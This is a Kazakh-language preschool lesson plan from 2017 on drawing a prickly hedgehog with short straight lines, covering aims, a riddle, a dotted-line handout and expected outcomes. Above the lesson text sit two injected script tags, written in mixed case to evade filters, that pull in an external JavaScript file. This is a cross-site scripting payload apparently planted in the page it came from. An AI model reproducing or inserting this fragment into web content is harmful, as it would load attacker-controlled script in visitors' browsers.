<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
25.02.2017
Ғ.Әбдірахманұлы атындағы Қима орта мектебінің жағындағы шағын орталығы.
Білім беру саласы: Шығармашылық.
Бөлімі: Сурет салу
Тақырыбы: Тікенекті кірпі.
Мақсаты: Балалардың тікенеті кірпі туралы түсініктерін жетілдіру. Қысқа түзу сызықтарды сызу арқылы кірпінің суретін салуға жаттықтыру. Жануарларға, аңдарға қамқорлық жасай білуге тәрбиелеу.
Сабаққа деген қызығушылығын артыру үшін жұмбақ жасыру. Балалар жұмбақты шешкен соң, балаларға иллюстрациялық суреттерді көрсете отырып,кірпі туралы, оның тіршілігі және оның ерекше тікенектері жайлы түсінік беру. Сөздік жұмысын жүргізу. Балаларға кірпінің тікенектерін салу тәсілін көрсету. Сурет салуға арналған ,үзік сызықтармен бейнеленген кірпі үлгісі бар үлестірмелі материалды таратып беру. Балалар алдымен үзік сызықтарды қосып, кірпінің бейнесін дайындап алады.Ішін сұр түсті қарындашпен жұқалап тегістеп бояйды. Содан соң қысқа тік сызықтар түсіру арқылы тікенектерін салады. Әр балалардың суреттеріне қарап, өте жақсы салғандарын мадақтау.
Күтілетін нәтиже:
Тікенекті кірпі туралы түсінікті біледі. Үзік сызықтарды қосып, қысқа, түзу сызықтарды сызу арқылы кірпіні салуды меңгереді.